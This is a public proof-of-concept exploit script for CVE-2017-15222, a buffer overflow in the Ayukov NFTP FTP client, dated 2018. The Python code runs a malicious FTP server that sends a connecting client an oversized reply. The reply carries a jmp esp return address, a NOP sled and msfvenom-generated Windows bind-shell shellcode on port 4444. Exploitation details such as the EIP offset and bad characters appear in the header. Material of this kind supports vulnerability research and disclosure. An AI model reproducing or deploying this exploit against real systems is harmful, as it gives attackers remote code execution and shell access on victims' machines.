# Exploit Title: Ayukov NFTP FTP Client 2.0 - Buffer Overflow
# Date: 2018-12-29
# Exploit Author: Uday Mittal
# Vendor Homepage: http://www.ayukov.com/nftp/
# Software Link: ftp://ftp.ayukov.com/pub/src/nftp-1.72.zip 
# Version : below 2.0
# Tested on: Microsoft Windows XP SP3
# CVE: CVE-2017-15222

# EIP Location: 4116
# Buffer starts from : 4121
# 0x7e45b310 : jmp esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll)
# badchars: '\x00\x0A\x0D\x40'
# Shellcode: msfvenom -p windows/shell_bind_tcp RHOST=192.168.43.72 LPORT=4444 -b '\x00\x0A\x0D' -f python

import socket

IP = '192.168.43.28'
port = 21

buf =  ""
buf += "\xbb\x04\x8b\xfc\xf1\xd9\xc4\xd9\x74\x24\xf4\x5a\x29"
buf += "\xc9\xb1\x53\x83\xea\xfc\x31\x5a\x0e\x03\x5e\x85\x1e"
buf += "\x04\xa2\x71\x5c\xe7\x5a\x82\x01\x61\xbf\xb3\x01\x15"
buf += "\xb4\xe4\xb1\x5d\x98\x08\x39\x33\x08\x9a\x4f\x9c\x3f"
buf += "\x2b\xe5\xfa\x0e\xac\x56\x3e\x11\x2e\xa5\x13\xf1\x0f"
buf += "\x66\x66\xf0\x48\x9b\x8b\xa0\x01\xd7\x3e\x54\x25\xad"
buf += "\x82\xdf\x75\x23\x83\x3c\xcd\x42\xa2\x93\x45\x1d\x64"
buf += "\x12\x89\x15\x2d\x0c\xce\x10\xe7\xa7\x24\xee\xf6\x61"
buf += "\x75\x0f\x54\x4c\xb9\xe2\xa4\x89\x7e\x1d\xd3\xe3\x7c"
buf += "\xa0\xe4\x30\xfe\x7e\x60\xa2\x58\xf4\xd2\x0e\x58\xd9"
buf += "\x85\xc5\x56\x96\xc2\x81\x7a\x29\x06\xba\x87\xa2\xa9"
buf += "\x6c\x0e\xf0\x8d\xa8\x4a\xa2\xac\xe9\x36\x05\xd0\xe9"
buf += "\x98\xfa\x74\x62\x34\xee\x04\x29\x51\xc3\x24\xd1\xa1"
buf += "\x4b\x3e\xa2\x93\xd4\x94\x2c\x98\x9d\x32\xab\xdf\xb7"
buf += "\x83\x23\x1e\x38\xf4\x6a\xe5\x6c\xa4\x04\xcc\x0c\x2f"
buf += "\xd4\xf1\xd8\xda\xdc\x54\xb3\xf8\x21\x26\x63\xbd\x89"
buf += "\xcf\x69\x32\xf6\xf0\x91\x98\x9f\x99\x6f\x23\x8e\x05"
buf += "\xf9\xc5\xda\xa5\xaf\x5e\x72\x04\x94\x56\xe5\x77\xfe"
buf += "\xce\x81\x30\xe8\xc9\xae\xc0\x3e\x7e\x38\x4b\x2d\xba"
buf += "\x59\x4c\x78\xea\x0e\xdb\xf6\x7b\x7d\x7d\x06\x56\x15"
buf += "\x1e\x95\x3d\xe5\x69\x86\xe9\xb2\x3e\x78\xe0\x56\xd3"
buf += "\x23\x5a\x44\x2e\xb5\xa5\xcc\xf5\x06\x2b\xcd\x78\x32"
buf += "\x0f\xdd\x44\xbb\x0b\x89\x18\xea\xc5\x67\xdf\x44\xa4"
buf += "\xd1\x89\x3b\x6e\xb5\x4c\x70\xb1\xc3\x50\x5d\x47\x2b"
buf += "\xe0\x08\x1e\x54\xcd\xdc\x96\x2d\x33\x7d\x58\xe4\xf7"
buf += "\x8d\x13\xa4\x5e\x06\xfa\x3d\xe3\x4b\xfd\xe8\x20\x72"
buf += "\x7e\x18\xd9\x81\x9e\x69\xdc\xce\x18\x82\xac\x5f\xcd"
buf += "\xa4\x03\x5f\xc4"

evil = "A"*4116 + "\x10\xb3\x45\x7e" + "\x90"*100 +  buf + "D"*10425

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((IP, port))
        s.listen(20)
        print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")

while True:
    conn, addr = s.accept()
    conn.send('220 Welcome!' + '\r\n')
    print conn.recv(1024)
    conn.send('331 OK.\r\n')
    print conn.recv(1024)
    conn.send('230 OK.\r\n')
    print conn.recv(1024)
    conn.send(evil + '\r\n')
    print conn.recv(1024)
    conn.send('257' + '\r\n')